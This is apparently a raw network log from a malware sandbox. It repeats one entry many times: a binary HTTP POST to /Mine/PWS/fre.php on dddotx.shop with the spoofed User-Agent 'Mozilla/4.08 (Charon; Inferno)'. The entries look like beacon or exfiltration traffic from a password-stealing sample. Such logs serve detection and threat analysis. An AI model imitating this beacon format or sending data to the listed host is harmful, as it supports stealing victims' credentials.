Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
